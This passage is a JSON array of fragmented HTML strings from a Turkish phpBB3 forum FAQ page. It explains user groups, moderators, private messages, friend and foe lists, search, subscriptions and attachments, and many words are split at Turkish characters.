            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Kullan\u0131c\u0131 Seviyeleri ve Gruplar</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r0\"></a><b>&#187; Y",
            "netici nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Y",
            "neticiler panodaki en ",
            "st d",
            "zeyde kontrol hakk\u0131na sahip olan ",
            "yelerdir. Bu ",
            "yeler izinleri ayarlama, ",
            "yeleri uzakla\u015ft\u0131rma, kullan\u0131c\u0131 gruplar\u0131 ve yetkilileri olu\u015fturma gibi b",
            "n kontrollere h",
            "kmetme di\u011fer pano y",
            "neticilerinin ve pano kurucusunun izinlerine ba\u011fl\u0131 kalarak hareket etme hakk\u0131na sahiptir. Ayn\u0131 zamanda yetkilerinin forumlar\u0131nda sahip oldu\u011fu b",
            "zenleme yeteneklerine de sahip olup, pano kurucusuna ba\u011f\u0131ml\u0131 olarak hareket ederler.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r1\"></a><b>&#187; Yetkili nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Yetkililer (yayg\u0131n ad\u0131 ile moderat",
            "r) bireysel (ya da grup olarak) g",
            "n be g",
            "netikleri forumlar\u0131 g",
            "zlemlemek g",
            "revini ",
            "stlenmi\u015f olan kimselerdir. Y",
            "nettikleri forumlarda iletileri d",
            "zenleme, silme ya da kilitleme, kilitli iletiyi a",
            "ma, ta\u015f\u0131ma ya da ba\u015fl\u0131klar\u0131 b",
            "lme g",
            "ne sahiptirler. Genellikle yetkililer kapal\u0131 ba\u015fl\u0131klar\u0131 ve olumsuz materyal ihtiva eden iletileri engellemekle g",
            "revlendirilirler.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r2\"></a><b>&#187; Kullan\u0131c\u0131 grubu nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kullan\u0131c\u0131 gruplar\u0131n\u0131 pano y",
            "neticileri olu\u015ftururlar. Her kullan\u0131c\u0131 birden fazla gruba ",
            "ye olabilir (bu durum panodan panoya de\u011fi\u015fiklik g",
            "sterebilir) ve her grubun kendine has giri\u015f izinleri olabilir. Bu y",
            "neticinin her forum i",
            "in birden fazla yetkili atamas\u0131n\u0131 kolayla\u015f\u0131t\u0131r, ya da ",
            "yelerin ",
            "zel forumlara giri\u015flerine imkan sa\u011flar.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r3\"></a><b>&#187; Kullan\u0131c\u0131 gruplar\u0131 nerede ve bir gruba nas\u0131l kat\u0131l\u0131r\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kullan\u0131c\u0131 Kontrol Panelinizdeki \u201cKullan\u0131c\u0131 Gruplar\u0131\u201d linkini t\u0131klayarak kullan\u0131c\u0131 gruplar\u0131n\u0131 g",
            "rebilirsiniz. E\u011fer bu gruplardan birine kat\u0131lmak istiyorsan\u0131z, ilgili butonu t\u0131klaman\u0131z yeterlidir. B",
            "n gruplar a",
            "\u0131k giri\u015fli de\u011fildir. Baz\u0131lar\u0131 kat\u0131lman\u0131z i",
            "in onay gerektirebilir ve baz\u0131lar\u0131 tamamen gizli grup ",
            "yeli\u011fine sahip olabilir. E\u011fer grup a",
            "\u0131k ise ilgili butonu t\u0131klayarak gruba kat\u0131labilirsiniz. E\u011fer onay gerektiren bir gruba kat\u0131lmak istiyorsan\u0131z yine ilgili butonu t\u0131klayarak ba\u015fvurabilirsiniz. Kullan\u0131c\u0131 Grubu lider gruba neden kat\u0131lmak istedi\u011finizi sorma yetkisine sahiptir. L",
            "tfen, talebinizin geri ",
            "evirilmesi durumunda grup liderine bask\u0131 yapmay\u0131n.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r4\"></a><b>&#187; Nas\u0131l bir grup lideri olabilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Y",
            "netici taraf\u0131ndan bir Kullan\u0131c\u0131 Grubu olu\u015fturuldu\u011fu zaman, ayn\u0131 zamanda Grup Liderini de atam\u0131\u015f olur E\u011fer bur kullan\u0131c\u0131 grubu olu\u015fturmak istiyorsan\u0131z ilk olarak y",
            "netici ile irtibat kurman\u0131z gerekir, bunun i",
            "in y",
            "neticiye bir ",
            "zel mesaj g",
            "nderebilirisniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r5\"></a><b>&#187; Neden baz\u0131 gruplar farkl\u0131 renkte g",
            "yor?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Muhtemelen pano y",
            "neticisi grup ",
            "yelerini daha kolay tan\u0131yabilmek i",
            "yelerine bir renk atam\u0131\u015ft\u0131r</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r6\"></a><b>&#187; \u201cVarsay\u0131lan Kullan\u0131c\u0131 Grubu\u201d nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer birden fazla kullan\u0131c\u0131 grubuna ",
            "ye iseniz, varsay\u0131lan grubunuz renk ve r",
            "tbe ile g",
            "sterilen gruptur. Pano y",
            "neticisi Kullan\u0131c\u0131 Paneli ",
            "zerinden varsay\u0131lan izinlerinizi de\u011fi\u015ftirebilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f4r7\"></a><b>&#187; \u201cY",
            "netim ekibi\u201d ba\u011f\u0131 nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bu sayfa size pano g",
            "revlilerinin bir listesini sa\u011flar, bu liste y",
            "neticileri ve yetkileri hangi sayfalarda yetkili olduklar\u0131 bilgisiyle birlikte g",
            "sterir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>",
            "zel Mesajla\u015fma</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f5r0\"></a><b>&#187; ",
            "zel mesaj g",
            "nderemiyorum!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bunun ",
            " sebebi vard\u0131r; kaydolmam\u0131\u015f ve/veya ",
            "evirimi",
            "i giri\u015f yapmam\u0131\u015fs\u0131n\u0131zd\u0131r, pano y",
            "neticisi pano ",
            "zerinde ",
            "zel mesaj g",
            "nderme iznini iptal etmi\u015ftir, ya da y",
            "netici mesaj g",
            "ndermenizi engellemi\u015ftir. E\u011fer son durum s",
            "z konusu ise sebebini ",
            "\u011frenmek i",
            "in pano y",
            "neticisiyle irtibata ge",
            "ebilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f5r1\"></a><b>&#187; \u0130stenmeyen ",
            "zel mesajlar almaya devam ediyorum!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kontrol panelinizdeki mesaj kurallar\u0131n\u0131 kullanarak bir ",
            "yenin size ",
            "zel mesaj g",
            "ndermesini engelleyebilirsiniz. E\u011fer ",
            "yelerden birinden ho\u015f olmayan ",
            "zel mesajlar al\u0131yorsan\u0131z konuyu y",
            "neticiye iletebilirsiniz, y",
            "neticiler bir kullan\u0131c\u0131n\u0131n ",
            "zel mesaj g",
            "ndermesini tamamen engelleyebiliriler. Daha fazla bilgi i",
            "in y",
            "netici ile irtibata ge",
            "ebilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f5r2\"></a><b>&#187; Bu pano ",
            "yelerinden birinden istenmeyen ya da olumsuz i",
            "erikli e-posta al\u0131yorum!</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bunu duydu\u011fumuz i",
            "z. Bu panonun e-posta formu bu \u015fekilde posta g",
            "ndermek isteyenleri engellemek ve vazge",
            "irmek i",
            "in ki\u015fisel g",
            "venlik ",
            "zellikleri i",
            "ermektedir. Pano y",
            "neticisine ald\u0131\u011f\u0131n\u0131z e-postan\u0131n tam bir kopyas\u0131n\u0131 g",
            "ndermelisiniz, ba\u015fl\u0131k k\u0131sm\u0131n\u0131n (bu kullan\u0131c\u0131n\u0131n g",
            "nderdi\u011fi e-postan\u0131n ayr\u0131nt\u0131lar\u0131n\u0131n bir listesini verir) g",
            "nerilmesi ",
            "nemlidir. B",
            "ylelikle pano y",
            "neticisi harekete ge",
            "ebilir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Arkada\u015flar ve Yasakl\u0131lar</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f6r0\"></a><b>&#187; Arkada\u015flar\u0131m ve yasakl\u0131lar listesi nedir?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bu listeleri kullanarak panoya kay\u0131tl\u0131 di\u011fer kullan\u0131c\u0131lar\u0131 organize edebilirsiniz. Arkada\u015flar\u0131m listesine ekledi\u011finiz ",
            "yeler Kullan\u0131c\u0131 Panelinizde kolay ula\u015f\u0131m\u0131n\u0131z\u0131 sa\u011flamak i",
            "in listenecektir, b",
            "ylece listenizdekilerin ",
            "evirimi",
            "i durumlar\u0131n\u0131 g",
            "rebilir ve ",
            "zel mesaj g",
            "nderebilirsiniz. Tema deste\u011fine g",
            "re bu ",
            "yelerin g",
            "nderece\u011fi iletiler farkl\u0131 bir renkle g",
            "sterilecektir. E\u011fer bir kullan\u0131c\u0131y\u0131 yasaklananlar listenize eklerseniz, bu listedekilerin iletileri varsay\u0131lan ayar olarak gizlenecektir.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f6r1\"></a><b>&#187; Arkada\u015flar\u0131m / yasakl\u0131lar listesine kullan\u0131c\u0131lar\u0131 nas\u0131l eklerim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Pano kullan\u0131c\u0131lar\u0131n\u0131 iki yolla bu listelere eklersiniz. ",
            "yenin profilinde bulunan \u201cArkada\u015f ekle\u201d ya da \u201cYasakl\u0131 ",
            "ye ekle\u201d ba\u011flant\u0131lar\u0131n\u0131 kullanabilirsiniz. Buna alternatif olarak Kullan\u0131c\u0131 Panelinizden, do\u011furdan ",
            "yelerin adlar\u0131n\u0131 yazarak da ekleyebilirsiniz. Ayn\u0131 zamanda ayn\u0131 sayfay\u0131 kullanarak daha ",
            "nce ekledi\u011finiz bir ki\u015fiyi de listenizden ",
            "\u0131karabilirisniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Forumlarda Arama</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r0\"></a><b>&#187; Bir forumda veya forumlarda nas\u0131l arama yapar\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Pano anasayfa, forum ya da ba\u015fl\u0131k g",
            "sterim sayfas\u0131ndaki arama kutusuna aramak istedi\u011finiz terim ya da s",
            "kleri girerek arama yapabilirisniz. Ayr\u0131ca b",
            "n sayfalarda mevcut olan geli\u015fmi\u015f arama ba\u011flant\u0131s\u0131na t\u0131klayarak da arama ",
            "zelli\u011fini kullanabilirsiniz. Nas\u0131l arama yapaca\u011f\u0131n\u0131z kullan\u0131lan temaya ba\u011fl\u0131d\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r1\"></a><b>&#187; Neden \u201cSonu",
            " bulunamad\u0131\u201d hatas\u0131n\u0131 al\u0131yorum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Aramak ",
            "zere girmi\u015f oldu\u011funuz s",
            "kler ",
            "ok belirsiz ya da ",
            "ok fazla kullan\u0131lan ve phpBB3 taraf\u0131ndan listelenemeyecek s",
            "kler olabilir. Daha ",
            "zel bir girdi belirleyin ve geli\u015fmi\u015f arama sayfas\u0131ndaki ",
            "zellikleri kullanmay\u0131 deneyin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r2\"></a><b>&#187; Neden arama sonucunda bo\u015f bir sayfaya d",
            "yorum!?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Sunucuda bar\u0131nan ",
            "ok fazla sonu",
            " oldu\u011fundan bu sonucu al\u0131yorsunuz. Geli\u015fmi\u015f arama se",
            "ene\u011fini kullan\u0131n ve daha ",
            "zel bir girdi ile ve forumlarda aramay\u0131 deneyin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r3\"></a><b>&#187; ",
            "yeler i",
            "in nas\u0131l arar\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u201c",
            "yeler\u201d sayfas\u0131na girin ve \u201c",
            "ye bul\u201d linkini t\u0131klay\u0131n. A",
            "\u0131klama se",
            "eneklerini doldurun.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r4\"></a><b>&#187; Kendi iletilerimi ve konular\u0131m\u0131 nas\u0131l bulurum?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Kendi iletilerinizi g",
            "rmek i",
            "in Kullan\u0131c\u0131 Panelindeki ya da hesab\u0131n\u0131zdaki \"Kullan\u0131c\u0131n\u0131n iletilerini g",
            "ster\" linkini t\u0131klayabilirsiniz. Kendi a",
            "t\u0131\u011f\u0131n\u0131z ba\u015fl\u0131klar\u0131 g",
            "rmek i",
            "in Geli\u015fmi\u015f Arama sayfas\u0131ndaki uygun se",
            "enekleri kullanarak arama yapabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Konu \u0130zlemeleri ve S\u0131k Kullan\u0131lanlar</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f8r0\"></a><b>&#187; S\u0131k kullan\u0131lanlar ile konuya kaydolmak aras\u0131nda nas\u0131l bir fark vard\u0131r?</b></div>",
            "\t\t\t\t<div class=\"postbody\">phpBB3\u2019deki S\u0131k kullan\u0131lanlar, taray\u0131c\u0131n\u0131z\u0131n s\u0131k kullan\u0131lanlar ",
            "zelli\u011fine benzer. Bir g",
            "ncelleme olmas\u0131 durumunda uyar\u0131lmazs\u0131n\u0131z. Ancak, daha sonra bu ba\u015fl\u0131\u011fa kolayca ula\u015fabilirsiniz. Ba\u015fl\u0131\u011fa kay\u0131t olma ile aras\u0131nda fark, kay\u0131t oldu\u011funuz ba\u015fl\u0131klarda g",
            "ncelleme olmas\u0131 durumunda size haber veriliyor olmas\u0131d\u0131r.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f8r1\"></a><b>&#187; Belli bir forum ya da ba\u015fl\u0131\u011fa kaydolmak i",
            "in ne yapmal\u0131y\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Belli bir foruma kaydolmak i",
            "ncelikle oturum a",
            "mal\u0131s\u0131n\u0131z, \u201cForuma abone ol\u201d ba\u011flant\u0131s\u0131n\u0131 g",
            "z. Bu belli bir ba\u015fl\u0131\u011fa kaydolmada oldu\u011fu gibi sizi o foruma kaydeder. Bir ba\u015fl\u0131\u011fa kaydolmak i",
            "in, ya ba\u015fl\u0131\u011fa cevap yazars\u0131n\u0131z ve kontrol kutusunu i\u015faretlersiniz ya da ba\u015fl\u0131\u011f\u0131n i",
            "indeki kaydolma linkini t\u0131klars\u0131n\u0131z.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f8r2\"></a><b>&#187; Aboneliklerimi nas\u0131l silebilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Aboneliklerinizi silmek i",
            "in, Kullan\u0131c\u0131 Panelinize gidin ve abonelikler ba\u011flant\u0131t\u0131s\u0131n\u0131 takip edin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>Eklentiler</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f9r0\"></a><b>&#187; Bu panoda hangi eklentilere izin verilmekte?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Her pano y",
            "neticisi baz\u0131 belirli eklenti t",
            "rlerine izin verebilir ya da iznini kald\u0131rabilir. E\u011fer hangilerinin y",
            "klenebilece\u011finden emin de\u011filseniz, yard\u0131m i",
            "in y",
            "netici ile ileti\u015fim kurun.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f9r1\"></a><b>&#187; Kendime ait t",
            "m eklentileri nas\u0131l bulabilirim?</b></div>",
            "\t\t\t\t<div class=\"postbody\">E\u011fer y",
            "kledi\u011finiz eklerin listesini bulmak istiyorsan\u0131z, Kullan\u0131c\u0131 Panelinize girin ve eklenti sayfas\u0131na giden ba\u011flant\u0131lar\u0131 takip edin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t\t<tr> ",
            "\t\t\t<td class=\"cat\" align=\"center\"><h4>phpBB3 Konular\u0131</h4></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r0\"></a><b>&#187; Bu mesaj panosunu kim yazd\u0131?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bu yaz\u0131l\u0131m (de\u011fi\u015ftirilmemi\u015f hali ile) <a href=\"http://www.phpbb.com/\">phpBB Grubu</a> taraf\u0131ndan yaz\u0131lm\u0131\u015f ve lisanslanm\u0131\u015ft\u0131r. \u201c<a href=\"http://www.phpbbturkiye.net/hakkinda/gpl-lisansi.html\" title=\"GNU Genel Kamu Lisans\u0131\" onclick=\"this.target='_blank'\">GNU Genel Kamu Lisans\u0131</a>\u201d alt\u0131nda kullan\u0131ma sunulmu\u015ftur ve bu lisans\u0131n maddelerine uyarak yaz\u0131l\u0131m ",
            "zerinde ",
            "rce de\u011fi\u015fiklik yapabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
